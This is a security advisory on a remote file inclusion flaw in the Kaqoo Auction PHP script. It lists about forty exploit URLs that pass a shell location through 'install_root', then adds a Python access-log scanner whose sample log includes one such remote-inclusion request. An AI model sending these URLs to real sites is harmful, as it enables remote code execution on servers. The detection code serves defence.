Program: Kaqoo Auction

The vulnerability allows a remote user to execute an arbitrary PHP script on the target system. It exists because multiple scripts fail to properly validate the input passed in the "install_root" parameter. A remote user can execute an arbitrary PHP script on the target system with the privileges of the web server.

Examples:

http://www.SitE.com/include/core/support.inc.php?install_root=[Shell]
http://www.SitE.com/include/core/function.inc.php?install_root=[Shell]
http://www.SitE.com/include/core/rdal_object.inc.php?install_root=[Shell]
http://www.SitE.com/include/core/rdal_editor.inc.php?install_root=[Shell]
http://www.SitE.com/include/core/login.inc.php?install_root=[Shell]
http://www.SitE.com/include/core/request.inc.php?install_root=[Shell]
http://www.SitE.com/include/core/categories.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/item/save.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/item/preview.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/item/edit_item.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/item/new_item.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/item/item_info.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/search.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/item_edit.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/register_succsess.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/context_menu.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/item_repost.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/balance.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/featured.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/user.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/buynow.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/install_complete.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/fees_info.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/user_feedback.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/admin_balance.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/activate.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/user_info.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/member.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/add_bid.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/items_filter.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/my_info.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/register.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/leave_feedback.inc.php?install_root=[Shell]
http://www.SitE.com/include/display/user_auctions.inc.php?install_root=[Shell]
http://www.SitE.com/include/design/form.inc.php?install_root=[Shell]
http://www.SitE.com/include/processor.inc.php?install_root=[Shell]
http://www.SitE.com/include/interfaces.inc.php?install_root=[Shell]
http://www.SitE.com/include/left_menu.inc.php?install_root=[Shell]
http://www.SitE.com/include/login.inc.php?install_root=[Shell]
http://www.SitE.com/include/categories.inc.php?install_root=[Shell]
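As an added detection example (not part of the original advisory and not Kaqoo Auction's code), the following Python script scans combined-format web-server access logs for requests to the include-only scripts listed above and rates a request that supplies "install_root" with a remote URL as high. The log format, paths and IP addresses in the sample are assumptions and constructed data.

```python
"""Scan combined-format access logs (assumed format) for requests aimed at the
Kaqoo Auction install_root issue. Added example, not Kaqoo's own code."""
import re
from urllib.parse import parse_qs, urlsplit
# Combined log format: client ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Scripts under /include/ ending in .inc.php are meant to be included by other
# scripts, never requested directly, and never with a client-chosen install_root.
INCLUDE_PATH_RE = re.compile(r'^/include/.*\.inc\.php$')
REMOTE_SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)

def classify_request(target):
    """Return None for a benign request, else a (severity, reason) tuple."""
    parts = urlsplit(target)
    if not INCLUDE_PATH_RE.match(parts.path):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if 'install_root' not in params:
        return ('low', 'direct request to an include-only script')
    value = params['install_root'][0]  # parse_qs already URL-decodes the value
    if REMOTE_SCHEME_RE.match(value):
        return ('high', 'install_root points to a remote resource: ' + value)
    return ('medium', 'install_root supplied by the client: ' + value)

def scan_log(lines):
    """Return a list of (ip, target, severity, reason) for suspicious requests."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format
        verdict = classify_request(m.group('target'))
        if verdict is not None:
            findings.append((m.group('ip'), m.group('target')) + verdict)
    return findings

# Constructed sample log lines using documentation IP ranges, not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2006:13:55:36 +0000] "GET /index.php?cat=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2006:13:55:40 +0000] "GET /include/core/support.inc.php?install_root=http%3A%2F%2F198.51.100.7%2Fx.txt%3F HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Oct/2006:13:56:01 +0000] "GET /include/display/user.inc.php?install_root=%2Fvar%2Fwww%2Fkaqoo HTTP/1.1" 200 0 "-" "curl/7.15"',
    '198.51.100.23 - - [10/Oct/2006:13:56:05 +0000] "GET /include/left_menu.inc.php HTTP/1.1" 200 0 "-" "curl/7.15"',
]
if __name__ == '__main__':
    for ip, target, severity, reason in scan_log(SAMPLE_LOG):
        print(f'{severity.upper():6} {ip} {target} -> {reason}')
```

Any hit on an include-only script is worth reviewing even at the low level, since those files are never legitimately requested directly.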
